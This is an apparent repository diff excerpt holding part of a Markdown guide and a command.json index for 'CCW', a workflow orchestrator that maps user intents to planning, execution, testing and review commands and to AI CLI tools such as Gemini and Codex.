User: 我想优化系统性能,但不知道从哪入手
|
||||
CCW: Intent=exploration, Workflow=brainstorm→plan→execute
|
||||
→ /workflow:brainstorm:auto-parallel "探索系统性能优化方向"
|
||||
**批量解决阶段:**
|
||||
```bash
|
||||
/issue:plan --all-pending # 批量规划所有待处理
|
||||
/issue:queue # 生成优化执行队列
|
||||
/issue:execute # 并行执行
|
||||
```
|
||||
|
||||
### Example 5: Multi-Model Collaboration
|
||||
### lite-lite-lite vs multi-cli-plan
|
||||
|
||||
| 维度 | lite-lite-lite | multi-cli-plan |
|
||||
|------|---------------|----------------|
|
||||
| **产物** | 无文件 | IMPL_PLAN.md + plan.json + synthesis.json |
|
||||
| **状态** | 无状态 | 持久化 session |
|
||||
| **CLI选择** | 自动分析任务类型选择 | 配置驱动 |
|
||||
| **迭代** | 通过 AskUser | 多轮收敛 |
|
||||
| **执行** | 直接执行 | 通过 lite-execute |
|
||||
| **适用** | 快速修复、简单功能 | 复杂多步骤实现 |
|
||||
|
||||
**选择指南**:
|
||||
- 任务清晰、改动范围小 → `lite-lite-lite`
|
||||
- 需要多视角分析、复杂架构 → `multi-cli-plan`
|
||||
|
||||
### multi-cli-plan vs lite-plan
|
||||
|
||||
| 维度 | multi-cli-plan | lite-plan |
|
||||
|------|---------------|-----------|
|
||||
| **上下文** | ACE 语义搜索 | 手动文件模式 |
|
||||
| **分析** | 多 CLI 交叉验证 | 单次规划 |
|
||||
| **迭代** | 多轮直到收敛 | 单轮 |
|
||||
| **置信度** | 高 (共识驱动) | 中 (单一视角) |
|
||||
| **适用** | 需要多视角的复杂任务 | 直接明确的实现 |
|
||||
|
||||
**选择指南**:
|
||||
- 需求明确、路径清晰 → `lite-plan`
|
||||
- 需要权衡、多方案比较 → `multi-cli-plan`
|
||||
|
||||
## Artifact Flow Protocol
|
||||
|
||||
工作流产出的自动流转机制,支持不同格式产出间的意图提取和完成度判断。
|
||||
|
||||
### 产出格式
|
||||
|
||||
| 命令 | 产出位置 | 格式 | 关键字段 |
|
||||
|------|----------|------|----------|
|
||||
| `/workflow:lite-plan` | memory://plan | structured_plan | tasks, files, dependencies |
|
||||
| `/workflow:plan` | .workflow/{session}/IMPL_PLAN.md | markdown_plan | phases, tasks, risks |
|
||||
| `/workflow:execute` | execution_log.json | execution_report | completed_tasks, errors |
|
||||
| `/workflow:test-cycle-execute` | test_results.json | test_report | pass_rate, failures, coverage |
|
||||
| `/workflow:review-session-cycle` | review_report.md | review_report | findings, severity_counts |
|
||||
|
||||
### 意图提取 (Intent Extraction)
|
||||
|
||||
流转到下一步时,自动提取关键信息:
|
||||
|
||||
```
|
||||
User: 用 gemini 分析现有架构,然后让 codex 实现优化
|
||||
CCW: Detects tool preferences, executes in sequence
|
||||
→ Gemini CLI (analysis) → Codex CLI (implementation)
|
||||
plan → execute:
|
||||
提取: tasks (未完成), priority_order, files_to_modify, context_summary
|
||||
|
||||
execute → test:
|
||||
提取: modified_files, test_scope (推断), pending_verification
|
||||
|
||||
test → fix:
|
||||
条件: pass_rate < 0.95
|
||||
提取: failures, error_messages, affected_files, suggested_fixes
|
||||
|
||||
review → fix:
|
||||
条件: critical > 0 OR high > 3
|
||||
提取: findings (critical/high), fix_priority, affected_files
|
||||
```
|
||||
|
||||
### 完成度判断
|
||||
|
||||
**Test 完成度路由**:
|
||||
```
|
||||
pass_rate >= 0.95 AND coverage >= 0.80 → complete
|
||||
pass_rate >= 0.95 AND coverage < 0.80 → add_more_tests
|
||||
pass_rate >= 0.80 → fix_failures_then_continue
|
||||
pass_rate < 0.80 → major_fix_required
|
||||
```
|
||||
|
||||
**Review 完成度路由**:
|
||||
```
|
||||
critical == 0 AND high <= 3 → complete_or_optional_fix
|
||||
critical > 0 → mandatory_fix
|
||||
high > 3 → recommended_fix
|
||||
```
|
||||
|
||||
### 流转决策模式
|
||||
|
||||
**plan_execute_test**:
|
||||
```
|
||||
plan → execute → test
|
||||
↓ (if test fail)
|
||||
extract_failures → fix → test (max 3 iterations)
|
||||
↓ (if still fail)
|
||||
manual_intervention
|
||||
```
|
||||
|
||||
**iterative_improvement**:
|
||||
```
|
||||
execute → test → fix → test → ...
|
||||
loop until: pass_rate >= 0.95 OR iterations >= 3
|
||||
```
|
||||
|
||||
### 使用示例
|
||||
|
||||
```javascript
|
||||
// 执行完成后,根据产出决定下一步
|
||||
const result = await execute(plan)
|
||||
|
||||
// 提取意图流转到测试
|
||||
const testContext = extractIntent('execute_to_test', result)
|
||||
// testContext = { modified_files, test_scope, pending_verification }
|
||||
|
||||
// 测试完成后,根据完成度决定路由
|
||||
const testResult = await test(testContext)
|
||||
const nextStep = evaluateCompletion('test', testResult)
|
||||
// nextStep = 'fix_failures_then_continue' if pass_rate = 0.85
|
||||
```
|
||||
|
||||
## Reference
|
||||
|
||||
- [command.json](command.json) - 命令元数据、Flow 定义、意图规则、Artifact Flow
|
||||
|
||||
641
.claude/skills/ccw/command.json
Normal file
641
.claude/skills/ccw/command.json
Normal file
@@ -0,0 +1,641 @@
|
||||
{
|
||||
"_metadata": {
|
||||
"version": "2.0.0",
|
||||
"description": "Unified CCW command index with capabilities, flows, and intent rules"
|
||||
},
|
||||
|
||||
"capabilities": {
|
||||
"explore": {
|
||||
"description": "Codebase exploration and context gathering",
|
||||
"commands": ["/workflow:init", "/workflow:tools:gather", "/memory:load"],
|
||||
"agents": ["cli-explore-agent", "context-search-agent"]
|
||||
},
|
||||
"brainstorm": {
|
||||
"description": "Multi-perspective analysis and ideation",
|
||||
"commands": ["/workflow:brainstorm:auto-parallel", "/workflow:brainstorm:artifacts", "/workflow:brainstorm:synthesis"],
|
||||
"roles": ["product-manager", "system-architect", "ux-expert", "data-architect", "api-designer"]
|
||||
},
|
||||
"plan": {
|
||||
"description": "Task planning and decomposition",
|
||||
"commands": ["/workflow:lite-plan", "/workflow:plan", "/workflow:tdd-plan", "/task:create", "/task:breakdown"],
|
||||
"agents": ["cli-lite-planning-agent", "action-planning-agent"]
|
||||
},
|
||||
"verify": {
|
||||
"description": "Plan and quality verification",
|
||||
"commands": ["/workflow:action-plan-verify", "/workflow:tdd-verify"]
|
||||
},
|
||||
"execute": {
|
||||
"description": "Task execution and implementation",
|
||||
"commands": ["/workflow:lite-execute", "/workflow:execute", "/task:execute"],
|
||||
"agents": ["code-developer", "cli-execution-agent", "universal-executor"]
|
||||
},
|
||||
"bugfix": {
|
||||
"description": "Bug diagnosis and fixing",
|
||||
"commands": ["/workflow:lite-fix"],
|
||||
"agents": ["code-developer"]
|
||||
},
|
||||
"test": {
|
||||
"description": "Test generation and execution",
|
||||
"commands": ["/workflow:test-gen", "/workflow:test-fix-gen", "/workflow:test-cycle-execute"],
|
||||
"agents": ["test-fix-agent"]
|
||||
},
|
||||
"review": {
|
||||
"description": "Code review and quality analysis",
|
||||
"commands": ["/workflow:review-session-cycle", "/workflow:review-module-cycle", "/workflow:review", "/workflow:review-fix"]
|
||||
},
|
||||
"issue": {
|
||||
"description": "Issue lifecycle management - discover, accumulate, batch resolve",
|
||||
"commands": ["/issue:new", "/issue:discover", "/issue:discover-by-prompt", "/issue:plan", "/issue:queue", "/issue:execute", "/issue:manage"],
|
||||
"agents": ["issue-plan-agent", "issue-queue-agent", "cli-explore-agent"],
|
||||
"lifecycle": {
|
||||
"accumulation": {
|
||||
"description": "任务完成后进行需求扩展、bug分析、测试发现",
|
||||
"triggers": ["post-task review", "code review findings", "test failures"],
|
||||
"commands": ["/issue:discover", "/issue:discover-by-prompt", "/issue:new"]
|
||||
},
|
||||
"batch_resolution": {
|
||||
"description": "积累的issue集中规划和并行执行",
|
||||
"flow": ["plan", "queue", "execute"],
|
||||
"commands": ["/issue:plan --all-pending", "/issue:queue", "/issue:execute"]
|
||||
}
|
||||
}
|
||||
},
|
||||
"ui-design": {
|
||||
"description": "UI design and prototyping",
|
||||
"commands": ["/workflow:ui-design:explore-auto", "/workflow:ui-design:imitate-auto", "/workflow:ui-design:design-sync"],
|
||||
"agents": ["ui-design-agent"]
|
||||
},
|
||||
"memory": {
|
||||
"description": "Documentation and knowledge management",
|
||||
"commands": ["/memory:docs", "/memory:update-related", "/memory:update-full", "/memory:skill-memory"],
|
||||
"agents": ["doc-generator", "memory-bridge"]
|
||||
}
|
||||
},
|
||||
|
||||
"flows": {
|
||||
"_level_guide": {
|
||||
"L1": "Rapid - No artifacts, direct execution",
|
||||
"L2": "Lightweight - Memory/lightweight files, → lite-execute",
|
||||
"L3": "Standard - Session persistence, → execute/test-cycle-execute",
|
||||
"L4": "Brainstorm - Multi-role analysis + Session, → execute"
|
||||
},
|
||||
"lite-lite-lite": {
|
||||
"name": "Ultra-Rapid Execution",
|
||||
"level": "L1",
|
||||
"description": "零文件 + 自动CLI选择 + 语义描述 + 直接执行",
|
||||
"complexity": ["low"],
|
||||
"artifacts": "none",
|
||||
"steps": [
|
||||
{ "phase": "clarify", "description": "需求澄清 (AskUser if needed)" },
|
||||
{ "phase": "auto-select", "description": "任务分析 → 自动选择CLI组合" },
|
||||
{ "phase": "multi-cli", "description": "并行多CLI分析" },
|
||||
{ "phase": "decision", "description": "展示结果 → AskUser决策" },
|
||||
{ "phase": "execute", "description": "直接执行 (无中间文件)" }
|
||||
],
|
||||
"cli_hints": {
|
||||
"analysis": { "tool": "auto", "mode": "analysis", "parallel": true },
|
||||
"execution": { "tool": "auto", "mode": "write" }
|
||||
},
|
||||
"estimated_time": "10-30 min"
|
||||
},
|
||||
"rapid": {
|
||||
"name": "Rapid Iteration",
|
||||
"level": "L2",
|
||||
"description": "内存规划 + 直接执行",
|
||||
"complexity": ["low", "medium"],
|
||||
"artifacts": "memory://plan",
|
||||
"steps": [
|
||||
{ "command": "/workflow:lite-plan", "optional": false, "auto_continue": true },
|
||||
{ "command": "/workflow:lite-execute", "optional": false }
|
||||
],
|
||||
"cli_hints": {
|
||||
"explore_phase": { "tool": "gemini", "mode": "analysis", "trigger": "needs_exploration" },
|
||||
"execution": { "tool": "codex", "mode": "write", "trigger": "complexity >= medium" }
|
||||
},
|
||||
"estimated_time": "15-45 min"
|
||||
},
|
||||
"multi-cli-plan": {
|
||||
"name": "Multi-CLI Collaborative Planning",
|
||||
"level": "L2",
|
||||
"description": "ACE上下文 + 多CLI协作分析 + 迭代收敛 + 计划生成",
|
||||
"complexity": ["medium", "high"],
|
||||
"artifacts": ".workflow/.multi-cli-plan/{session}/",
|
||||
"steps": [
|
||||
{ "command": "/workflow:multi-cli-plan", "optional": false, "phases": [
|
||||
"context_gathering: ACE语义搜索",
|
||||
"multi_cli_discussion: cli-discuss-agent多轮分析",
|
||||
"present_options: 展示解决方案",
|
||||
"user_decision: 用户选择",
|
||||
"plan_generation: cli-lite-planning-agent生成计划"
|
||||
]},
|
||||
{ "command": "/workflow:lite-execute", "optional": false }
|
||||
],
|
||||
"vs_lite_plan": {
|
||||
"context": "ACE semantic search vs Manual file patterns",
|
||||
"analysis": "Multi-CLI cross-verification vs Single-pass planning",
|
||||
"iteration": "Multiple rounds until convergence vs Single round",
|
||||
"confidence": "High (consensus-based) vs Medium (single perspective)",
|
||||
"best_for": "Complex tasks needing multiple perspectives vs Straightforward implementations"
|
||||
},
|
||||
"agents": ["cli-discuss-agent", "cli-lite-planning-agent"],
|
||||
"cli_hints": {
|
||||
"discussion": { "tools": ["gemini", "codex", "claude"], "mode": "analysis", "parallel": true },
|
||||
"planning": { "tool": "gemini", "mode": "analysis" }
|
||||
},
|
||||
"estimated_time": "30-90 min"
|
||||
},
|
||||
"coupled": {
|
||||
"name": "Standard Planning",
|
||||
"level": "L3",
|
||||
"description": "完整规划 + 验证 + 执行",
|
||||
"complexity": ["medium", "high"],
|
||||
"artifacts": ".workflow/active/{session}/",
|
||||
"steps": [
|
||||
{ "command": "/workflow:plan", "optional": false },
|
||||
{ "command": "/workflow:action-plan-verify", "optional": false, "auto_continue": true },
|
||||
{ "command": "/workflow:execute", "optional": false },
|
||||
{ "command": "/workflow:review", "optional": true }
|
||||
],
|
||||
"cli_hints": {
|
||||
"pre_analysis": { "tool": "gemini", "mode": "analysis", "trigger": "always" },
|
||||
"execution": { "tool": "codex", "mode": "write", "trigger": "always" }
|
||||
},
|
||||
"estimated_time": "2-4 hours"
|
||||
},
|
||||
"full": {
|
||||
"name": "Full Exploration (Brainstorm)",
|
||||
"level": "L4",
|
||||
"description": "头脑风暴 + 规划 + 执行",
|
||||
"complexity": ["high"],
|
||||
"artifacts": ".workflow/active/{session}/.brainstorming/",
|
||||
"steps": [
|
||||
{ "command": "/workflow:brainstorm:auto-parallel", "optional": false, "confirm_before": true },
|
||||
{ "command": "/workflow:plan", "optional": false },
|
||||
{ "command": "/workflow:action-plan-verify", "optional": true, "auto_continue": true },
|
||||
{ "command": "/workflow:execute", "optional": false }
|
||||
],
|
||||
"cli_hints": {
|
||||
"role_analysis": { "tool": "gemini", "mode": "analysis", "trigger": "always", "parallel": true },
|
||||
"execution": { "tool": "codex", "mode": "write", "trigger": "task_count >= 3" }
|
||||
},
|
||||
"estimated_time": "1-3 hours"
|
||||
},
|
||||
"bugfix": {
|
||||
"name": "Bug Fix",
|
||||
"level": "L2",
|
||||
"description": "智能诊断 + 修复 (5 phases)",
|
||||
"complexity": ["low", "medium"],
|
||||
"artifacts": ".workflow/.lite-fix/{bug-slug}-{date}/",
|
||||
"variants": {
|
||||
"standard": [{ "command": "/workflow:lite-fix", "optional": false }],
|
||||
"hotfix": [{ "command": "/workflow:lite-fix --hotfix", "optional": false }]
|
||||
},
|
||||
"phases": [
|
||||
"Phase 1: Bug Analysis & Diagnosis (severity pre-assessment)",
|
||||
"Phase 2: Clarification (optional, AskUserQuestion)",
|
||||
"Phase 3: Fix Planning (Low/Medium → Claude, High/Critical → cli-lite-planning-agent)",
|
||||
"Phase 4: Confirmation & Selection",
|
||||
"Phase 5: Execute (→ lite-execute --mode bugfix)"
|
||||
],
|
||||
"cli_hints": {
|
||||
"diagnosis": { "tool": "gemini", "mode": "analysis", "trigger": "always" },
|
||||
"fix": { "tool": "codex", "mode": "write", "trigger": "severity >= medium" }
|
||||
},
|
||||
"estimated_time": "10-30 min"
|
||||
},
|
||||
"issue": {
|
||||
"name": "Issue Lifecycle",
|
||||
"level": "Supplementary",
|
||||
"description": "发现积累 → 批量规划 → 队列优化 → 并行执行 (Main Workflow 补充机制)",
|
||||
"complexity": ["medium", "high"],
|
||||
"artifacts": ".workflow/.issues/",
|
||||
"purpose": "Post-development continuous maintenance, maintain main branch stability",
|
||||
"phases": {
|
||||
"accumulation": {
|
||||
"description": "项目迭代中持续发现和积累issue",
|
||||
"commands": ["/issue:discover", "/issue:discover-by-prompt", "/issue:new"],
|
||||
"trigger": "post-task, code-review, test-failure"
|
||||
},
|
||||
"resolution": {
|
||||
"description": "集中规划和执行积累的issue",
|
||||
"steps": [
|
||||
{ "command": "/issue:plan --all-pending", "optional": false },
|
||||
{ "command": "/issue:queue", "optional": false },
|
||||
{ "command": "/issue:execute", "optional": false }
|
||||
]
|
||||
}
|
||||
},
|
||||
"worktree_support": {
|
||||
"description": "可选的 worktree 隔离,保持主分支稳定",
|
||||
"use_case": "主开发完成后的 issue 修复"
|
||||
},
|
||||
"cli_hints": {
|
||||
"discovery": { "tool": "gemini", "mode": "analysis", "trigger": "perspective_analysis", "parallel": true },
|
||||
"solution_generation": { "tool": "gemini", "mode": "analysis", "trigger": "always", "parallel": true },
|
||||
"batch_execution": { "tool": "codex", "mode": "write", "trigger": "always" }
|
||||
},
|
||||
"estimated_time": "1-4 hours"
|
||||
},
|
||||
"tdd": {
|
||||
"name": "Test-Driven Development",
|
||||
"level": "L3",
|
||||
"description": "TDD规划 + 执行 + 验证 (6 phases)",
|
||||
"complexity": ["medium", "high"],
|
||||
"artifacts": ".workflow/active/{session}/",
|
||||
"steps": [
|
||||
{ "command": "/workflow:tdd-plan", "optional": false },
|
||||
{ "command": "/workflow:action-plan-verify", "optional": true, "auto_continue": true },
|
||||
{ "command": "/workflow:execute", "optional": false },
|
||||
{ "command": "/workflow:tdd-verify", "optional": false }
|
||||
],
|
||||
"tdd_structure": {
|
||||
"description": "Each IMPL task contains complete internal Red-Green-Refactor cycle",
|
||||
"meta": "tdd_workflow: true",
|
||||
"flow_control": "implementation_approach contains 3 steps (red/green/refactor)"
|
||||
},
|
||||
"cli_hints": {
|
||||
"test_strategy": { "tool": "gemini", "mode": "analysis", "trigger": "always" },
|
||||
"red_green_refactor": { "tool": "codex", "mode": "write", "trigger": "always" }
|
||||
},
|
||||
"estimated_time": "1-3 hours"
|
||||
},
|
||||
"test-fix": {
|
||||
"name": "Test Fix Generation",
|
||||
"level": "L3",
|
||||
"description": "测试修复生成 + 执行循环 (5 phases)",
|
||||
"complexity": ["medium", "high"],
|
||||
"artifacts": ".workflow/active/WFS-test-{session}/",
|
||||
"dual_mode": {
|
||||
"session_mode": { "input": "WFS-xxx", "context_source": "Source session summaries" },
|
||||
"prompt_mode": { "input": "Text/file path", "context_source": "Direct codebase analysis" }
|
||||
},
|
||||
"steps": [
|
||||
{ "command": "/workflow:test-fix-gen", "optional": false },
|
||||
{ "command": "/workflow:test-cycle-execute", "optional": false }
|
||||
],
|
||||
"task_structure": [
|
||||
"IMPL-001.json (test understanding & generation)",
|
||||
"IMPL-001.5-review.json (quality gate)",
|
||||
"IMPL-002.json (test execution & fix cycle)"
|
||||
],
|
||||
"cli_hints": {
|
||||
"analysis": { "tool": "gemini", "mode": "analysis", "trigger": "always" },
|
||||
"fix_cycle": { "tool": "codex", "mode": "write", "trigger": "pass_rate < 0.95" }
|
||||
},
|
||||
"estimated_time": "1-2 hours"
|
||||
},
|
||||
"ui": {
|
||||
"name": "UI-First Development",
|
||||
"level": "L3/L4",
|
||||
"description": "UI设计 + 规划 + 执行",
|
||||
"complexity": ["medium", "high"],
|
||||
"artifacts": ".workflow/active/{session}/",
|
||||
"variants": {
|
||||
"explore": [
|
||||
{ "command": "/workflow:ui-design:explore-auto", "optional": false },
|
||||
{ "command": "/workflow:ui-design:design-sync", "optional": false, "auto_continue": true },
|
||||
{ "command": "/workflow:plan", "optional": false },
|
||||
{ "command": "/workflow:execute", "optional": false }
|
||||
],
|
||||
"imitate": [
|
||||
{ "command": "/workflow:ui-design:imitate-auto", "optional": false },
|
||||
{ "command": "/workflow:ui-design:design-sync", "optional": false, "auto_continue": true },
|
||||
{ "command": "/workflow:plan", "optional": false },
|
||||
{ "command": "/workflow:execute", "optional": false }
|
||||
]
|
||||
},
|
||||
"estimated_time": "2-4 hours"
|
||||
},
|
||||
"review-fix": {
|
||||
"name": "Review and Fix",
|
||||
"level": "L3",
|
||||
"description": "多维审查 + 自动修复",
|
||||
"complexity": ["medium"],
|
||||
"artifacts": ".workflow/active/{session}/review_report.md",
|
||||
"steps": [
|
||||
{ "command": "/workflow:review-session-cycle", "optional": false },
|
||||
{ "command": "/workflow:review-fix", "optional": true }
|
||||
],
|
||||
"cli_hints": {
|
||||
"multi_dimension_review": { "tool": "gemini", "mode": "analysis", "trigger": "always", "parallel": true },
|
||||
"auto_fix": { "tool": "codex", "mode": "write", "trigger": "findings_count >= 3" }
|
||||
},
|
||||
"estimated_time": "30-90 min"
|
||||
},
|
||||
"docs": {
|
||||
"name": "Documentation",
|
||||
"level": "L2",
|
||||
"description": "批量文档生成",
|
||||
"complexity": ["low", "medium"],
|
||||
"variants": {
|
||||
"incremental": [{ "command": "/memory:update-related", "optional": false }],
|
||||
"full": [
|
||||
{ "command": "/memory:docs", "optional": false },
|
||||
{ "command": "/workflow:execute", "optional": false }
|
||||
]
|
||||
},
|
||||
"estimated_time": "15-60 min"
|
||||
}
|
||||
},
|
||||
|
||||
"intent_rules": {
|
||||
"_level_mapping": {
|
||||
"description": "Intent → Level → Flow mapping guide",
|
||||
"L1": ["lite-lite-lite"],
|
||||
"L2": ["rapid", "bugfix", "multi-cli-plan", "docs"],
|
||||
"L3": ["coupled", "tdd", "test-fix", "review-fix", "ui"],
|
||||
"L4": ["full"],
|
||||
"Supplementary": ["issue"]
|
||||
},
|
||||
"bugfix": {
|
||||
"priority": 1,
|
||||
"level": "L2",
|
||||
"variants": {
|
||||
"hotfix": {
|
||||
"patterns": ["hotfix", "urgent", "production", "critical", "emergency", "紧急", "生产环境", "线上"],
|
||||
"flow": "bugfix.hotfix"
|
||||
},
|
||||
"standard": {
|
||||
"patterns": ["fix", "bug", "error", "issue", "crash", "broken", "fail", "wrong", "修复", "错误", "崩溃"],
|
||||
"flow": "bugfix.standard"
|
||||
}
|
||||
}
|
||||
},
|
||||
"issue_batch": {
|
||||
"priority": 2,
|
||||
"level": "Supplementary",
|
||||
"patterns": {
|
||||
"batch": ["issues", "batch", "queue", "多个", "批量"],
|
||||
"action": ["fix", "resolve", "处理", "解决"]
|
||||
},
|
||||
"require_both": true,
|
||||
"flow": "issue"
|
||||
},
|
||||
"exploration": {
|
||||
"priority": 3,
|
||||
"level": "L4",
|
||||
"patterns": ["不确定", "不知道", "explore", "研究", "分析一下", "怎么做", "what if", "探索"],
|
||||
"flow": "full"
|
||||
},
|
||||
"multi_perspective": {
|
||||
"priority": 3,
|
||||
"level": "L2",
|
||||
"patterns": ["多视角", "权衡", "比较方案", "cross-verify", "多CLI", "协作分析"],
|
||||
"flow": "multi-cli-plan"
|
||||
},
|
||||
"quick_task": {
|
||||
"priority": 4,
|
||||
"level": "L1",
|
||||
"patterns": ["快速", "简单", "small", "quick", "simple", "trivial", "小改动"],
|
||||
"flow": "lite-lite-lite"
|
||||
},
|
||||
"ui_design": {
|
||||
"priority": 5,
|
||||
"level": "L3/L4",
|
||||
"patterns": ["ui", "界面", "design", "设计", "component", "组件", "style", "样式", "layout", "布局"],
|
||||
"variants": {
|
||||
"imitate": { "triggers": ["参考", "模仿", "像", "类似"], "flow": "ui.imitate" },
|
||||
"explore": { "triggers": [], "flow": "ui.explore" }
|
||||
}
|
||||
},
|
||||
"tdd": {
|
||||
"priority": 6,
|
||||
"level": "L3",
|
||||
"patterns": ["tdd", "test-driven", "测试驱动", "先写测试", "test first"],
|
||||
"flow": "tdd"
|
||||
},
|
||||
"test_fix": {
|
||||
"priority": 7,
|
||||
"level": "L3",
|
||||
"patterns": ["测试失败", "test fail", "fix test", "test error", "pass rate", "coverage gap"],
|
||||
"flow": "test-fix"
|
||||
},
|
||||
"review": {
|
||||
"priority": 8,
|
||||
"level": "L3",
|
||||
"patterns": ["review", "审查", "检查代码", "code review", "质量检查"],
|
||||
"flow": "review-fix"
|
||||
},
|
||||
"documentation": {
|
||||
"priority": 9,
|
||||
"level": "L2",
|
||||
"patterns": ["文档", "documentation", "docs", "readme"],
|
||||
"variants": {
|
||||
"incremental": { "triggers": ["更新", "增量"], "flow": "docs.incremental" },
|
||||
"full": { "triggers": ["全部", "完整"], "flow": "docs.full" }
|
||||
}
|
||||
},
|
||||
"feature": {
|
||||
"priority": 99,
|
||||
"complexity_map": {
|
||||
"high": { "level": "L3", "flow": "coupled" },
|
||||
"medium": { "level": "L2", "flow": "rapid" },
|
||||
"low": { "level": "L1", "flow": "lite-lite-lite" }
|
||||
}
|
||||
}
|
||||
},
|
||||
|
||||
"complexity_indicators": {
|
||||
"high": {
|
||||
"threshold": 4,
|
||||
"patterns": {
|
||||
"architecture": { "keywords": ["refactor", "重构", "migrate", "迁移", "architect", "架构", "system", "系统"], "weight": 2 },
|
||||
"multi_module": { "keywords": ["multiple", "多个", "across", "跨", "all", "所有", "entire", "整个"], "weight": 2 },
|
||||
"integration": { "keywords": ["integrate", "集成", "api", "database", "数据库"], "weight": 1 },
|
||||
"quality": { "keywords": ["security", "安全", "performance", "性能", "scale", "扩展"], "weight": 1 }
|
||||
}
|
||||
},
|
||||
"medium": { "threshold": 2 },
|
||||
"low": { "threshold": 0 }
|
||||
},
|
||||
|
||||
"cli_tools": {
|
||||
"gemini": {
|
||||
"strengths": ["超长上下文", "深度分析", "架构理解", "执行流追踪"],
|
||||
"triggers": ["分析", "理解", "设计", "架构", "诊断"],
|
||||
"mode": "analysis"
|
||||
},
|
||||
"qwen": {
|
||||
"strengths": ["代码模式识别", "多维度分析"],
|
||||
"triggers": ["评估", "对比", "验证"],
|
||||
"mode": "analysis"
|
||||
},
|
||||
"codex": {
|
||||
"strengths": ["精确代码生成", "自主执行"],
|
||||
"triggers": ["实现", "重构", "修复", "生成"],
|
||||
"mode": "write"
|
||||
}
|
||||
},
|
||||
|
||||
"cli_injection_rules": {
|
||||
"context_gathering": { "trigger": "file_read >= 50k OR module_count >= 5", "inject": "gemini --mode analysis" },
|
||||
"pre_planning_analysis": { "trigger": "complexity === high", "inject": "gemini --mode analysis" },
|
||||
"debug_diagnosis": { "trigger": "intent === bugfix AND root_cause_unclear", "inject": "gemini --mode analysis" },
|
||||
"code_review": { "trigger": "step === review", "inject": "gemini --mode analysis" },
|
||||
"implementation": { "trigger": "step === execute AND task_count >= 3", "inject": "codex --mode write" }
|
||||
},
|
||||
|
||||
"artifact_flow": {
|
||||
"_description": "定义工作流产出的格式、意图提取和流转规则",
|
||||
|
||||
"outputs": {
|
||||
"/workflow:lite-plan": {
|
||||
"artifact": "memory://plan",
|
||||
"format": "structured_plan",
|
||||
"fields": ["tasks", "files", "dependencies", "approach"]
|
||||
},
|
||||
"/workflow:plan": {
|
||||
"artifact": ".workflow/{session}/IMPL_PLAN.md",
|
||||
"format": "markdown_plan",
|
||||
"fields": ["phases", "tasks", "dependencies", "risks", "test_strategy"]
|
||||
},
|
||||
"/workflow:multi-cli-plan": {
|
||||
"artifact": ".workflow/.multi-cli-plan/{session}/",
|
||||
"format": "multi_file",
|
||||
"files": ["IMPL_PLAN.md", "plan.json", "synthesis.json"],
|
||||
"fields": ["consensus", "divergences", "recommended_approach", "tasks"]
|
||||
},
|
||||
"/workflow:lite-execute": {
|
||||
"artifact": "git_changes",
|
||||
"format": "code_diff",
|
||||
"fields": ["modified_files", "added_files", "deleted_files", "build_status"]
|
||||
},
|
||||
"/workflow:execute": {
|
||||
"artifact": ".workflow/{session}/execution_log.json",
|
||||
"format": "execution_report",
|
||||
"fields": ["completed_tasks", "pending_tasks", "errors", "warnings"]
|
||||
},
|
||||
"/workflow:test-cycle-execute": {
|
||||
"artifact": ".workflow/{session}/test_results.json",
|
||||
"format": "test_report",
|
||||
"fields": ["pass_rate", "failures", "coverage", "duration"]
|
||||
},
|
||||
"/workflow:review-session-cycle": {
|
||||
"artifact": ".workflow/{session}/review_report.md",
|
||||
"format": "review_report",
|
||||
"fields": ["findings", "severity_counts", "recommendations"]
|
||||
},
|
||||
"/workflow:lite-fix": {
|
||||
"artifact": "git_changes",
|
||||
"format": "fix_report",
|
||||
"fields": ["root_cause", "fix_applied", "files_modified", "verification_status"]
|
||||
}
|
||||
},
|
||||
|
||||
"intent_extraction": {
|
||||
"plan_to_execute": {
|
||||
"from": ["lite-plan", "plan", "multi-cli-plan"],
|
||||
"to": ["lite-execute", "execute"],
|
||||
"extract": {
|
||||
"tasks": "$.tasks[] | filter(status != 'completed')",
|
||||
"priority_order": "$.tasks | sort_by(priority)",
|
||||
"files_to_modify": "$.tasks[].files | flatten | unique",
|
||||
"dependencies": "$.dependencies",
|
||||
"context_summary": "$.approach OR $.recommended_approach"
|
||||
}
|
||||
},
|
||||
"execute_to_test": {
|
||||
"from": ["lite-execute", "execute"],
|
||||
"to": ["test-cycle-execute", "test-fix-gen"],
|
||||
"extract": {
|
||||
"modified_files": "$.modified_files",
|
||||
"test_scope": "infer_from($.modified_files)",
|
||||
"build_status": "$.build_status",
|
||||
"pending_verification": "$.completed_tasks | needs_test"
|
||||
}
|
||||
},
|
||||
"test_to_fix": {
|
||||
"from": ["test-cycle-execute"],
|
||||
"to": ["lite-fix", "review-fix"],
|
||||
"condition": "$.pass_rate < 0.95",
|
||||
"extract": {
|
||||
"failures": "$.failures",
|
||||
"error_messages": "$.failures[].message",
|
||||
"affected_files": "$.failures[].file",
|
||||
"suggested_fixes": "$.failures[].suggested_fix"
|
||||
}
|
||||
},
|
||||
"review_to_fix": {
|
||||
"from": ["review-session-cycle", "review-module-cycle"],
|
||||
"to": ["review-fix"],
|
||||
"condition": "$.severity_counts.critical > 0 OR $.severity_counts.high > 3",
|
||||
"extract": {
|
||||
"findings": "$.findings | filter(severity in ['critical', 'high'])",
|
||||
"fix_priority": "$.findings | group_by(category) | sort_by(severity)",
|
||||
"affected_files": "$.findings[].file | unique"
|
||||
}
|
||||
}
|
||||
},
|
||||
|
||||
"completion_criteria": {
|
||||
"plan": {
|
||||
"required": ["has_tasks", "has_files"],
|
||||
"optional": ["has_tests", "no_blocking_risks"],
|
||||
"threshold": 0.8,
|
||||
"routing": {
|
||||
"complete": "proceed_to_execute",
|
||||
"incomplete": "clarify_requirements"
|
||||
}
|
||||
},
|
||||
"execute": {
|
||||
"required": ["all_tasks_attempted", "no_critical_errors"],
|
||||
"optional": ["build_passes", "lint_passes"],
|
||||
"threshold": 1.0,
|
||||
"routing": {
|
||||
"complete": "proceed_to_test_or_review",
|
||||
"partial": "continue_execution",
|
||||
"failed": "diagnose_and_retry"
|
||||
}
|
||||
},
|
||||
"test": {
|
||||
"metrics": {
|
||||
"pass_rate": { "target": 0.95, "minimum": 0.80 },
|
||||
"coverage": { "target": 0.80, "minimum": 0.60 }
|
||||
},
|
||||
"routing": {
|
||||
"pass_rate >= 0.95 AND coverage >= 0.80": "complete",
|
||||
"pass_rate >= 0.95 AND coverage < 0.80": "add_more_tests",
|
||||
"pass_rate >= 0.80": "fix_failures_then_continue",
|
||||
"pass_rate < 0.80": "major_fix_required"
|
||||
}
|
||||
},
|
||||
"review": {
|
||||
"metrics": {
|
||||
"critical_findings": { "target": 0, "maximum": 0 },
|
||||
